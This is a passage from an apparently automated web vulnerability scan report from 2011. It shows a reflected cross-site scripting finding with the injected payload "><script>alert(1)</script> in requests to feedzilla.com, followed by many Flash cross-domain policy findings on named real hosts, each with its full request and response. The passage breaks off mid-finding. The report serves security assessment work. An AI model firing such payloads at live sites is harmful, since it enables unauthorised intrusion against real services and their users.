Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:02:42 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Location: http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352

<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET">
...[SNIP]...

4.707. http://www.feedzilla.com/rss/flash_feed.asp [cat parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedzilla.com
Path:   /rss/flash_feed.asp

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4df"><script>alert(1)</script>de2ee12f61a was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rss/flash_feed.asp?cat=business3b4df"><script>alert(1)</script>de2ee12f61a&Cat2=mortgage HTTP/1.1
Host: www.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:02:41 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Location: http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352

<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET">
...[SNIP]...

5. Flash cross-domain policy
There are 45 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://18.xg4ken.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 18.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:42:55 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "3a4007-c6-47b450a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.2. https://220marketing9-px.rtrk.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://220marketing9-px.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 220marketing9-px.rtrk.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:08:25 GMT
Server: Apache
Set-Cookie: RlocalUID=tc%3D11020308082556862; domain=.rtrk.com; path=/
Last-Modified: Sat, 09 May 2009 00:14:34 GMT
ETag: "cc-4696fa1390e80"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.3. http://69.16.184.135/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://69.16.184.135
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 69.16.184.135

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 18:52:09 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Accept-Ranges: none
Expires: Thu, 03 Feb 2011 19:52:09 GMT
Content-Length: 217
Content-Type: text/xml
X-HW: 1296759129.cc031d1

<?xml version="1.0"?>
<cross-domain-policy>
<!-- This is a master-policy file -->
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*" to-ports="80" />
</cross
...[SNIP]...

5.4. http://a.rfihub.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 199
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.5. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.6. http://ad.br.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.br.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.7. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 19:42:14 GMT
Date: Thu, 03 Feb 2011 13:42:58 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.8. http://admin.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Thu, 03 Feb 2011 18:53:04 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

5.9. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Thu, 03 Feb 2011 22:00:31 GMT
Date: Wed, 02 Feb 2011 22:00:31 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 56574

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.10. http://api.feedzilla.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.feedzilla.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: api.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Nov 2010 12:12:30 GMT
Accept-Ranges: bytes
ETag: "54d96c63507bcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Thu, 03 Feb 2011 16:01:12 GMT
Content-Length: 293

...<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.11. http://beacon.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 13:42:57 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.12. http://c5.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c5.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c5.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:04:15 GMT
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
X-Varnish: 1047669310
Date: Thu, 03 Feb 2011 16:11:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.13. http://c7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:04:15 GMT
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
X-Varnish: 1575557626
Date: Thu, 03 Feb 2011 16:09:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.14. http://dev.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT
Accept-Ranges: bytes
ETag: "a908de3f49acb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:06:48 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

5.15. https://graph.facebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://graph.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: graph.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sat, 05 Mar 2011 16:15:09 GMT
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

5.16. http://gsbmtg.rtrk.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gsbmtg.rtrk.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:10:20 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:39:12 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.17. http://i1.ytimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.ytimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: i1.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/v/H9TrHLL-oTU&hl=en_US&fs=1&rel=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Wed, 02 Feb 2011 19:09:33 GMT
Expires: Wed, 09 Feb 2011 19:09:33 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 76333
Content-Length: 102

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.18. http://lab.arc90.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://lab.arc90.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: lab.arc90.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Sat, 02 Jan 2010 21:22:51 GMT
ETag: "220281-8b-47c35173060c0"
Content-Type: application/xml
Content-Length: 139
Date: Thu, 03 Feb 2011 16:21:59 GMT
X-Varnish: 1335021700
Age: 0
Via: 1.1 varnish
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

5.19. http://loga2.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://loga2.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: loga2.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Length: 378
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 08:19:04 GMT
Accept-Ranges: bytes
ETag: "0ccdbb4d97ca1:9f7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:07:01 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.20. http://motifcdn2.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://motifcdn2.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: motifcdn2.doubleclick.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "adb6a2c1ae7705ddf1599956b34e42c2:1222813852"
Last-Modified: Tue, 30 Sep 2008 22:30:52 GMT
Content-Type: application/xml
Date: Thu, 03 Feb 2011 16:07:22 GMT
Content-Length: 339
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.21. http://netweather.accuweather.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://netwx.accuweather.com/netWx-V212.swf?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:50 GMT
Server: PWS/1.7.1.2
X-Px: ht jfk-agg-n11.panthercdn.com
ETag: "aaf332b5b423c71:14685"
Cache-Control: max-age=604800
Expires: Mon, 07 Feb 2011 08:48:33 GMT
Age: 286037
Content-Length: 206
Content-Type: text/xml
Last-Modified: Tue, 19 Dec 2006 21:29:04 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

5.22. http://news.feedzilla.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.feedzilla.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: news.feedzilla.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Nov 2010 12:12:30 GMT
Accept-Ranges: bytes
ETag: "54d96c63507bcb1:0"
Server: Microsoft-IIS/7.5
Date: Thu, 03 Feb 2011 16:22:30 GMT
Connection: close
Content-Length: 293

...<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.23. http://omnituretrack.local.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituretrack.local.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omnituretrack.local.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:06 GMT
Server: Omniture DC/2.0.0
xserver: www333
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.24. http://questionmarket.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: questionmarket.com

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:34:33 GMT
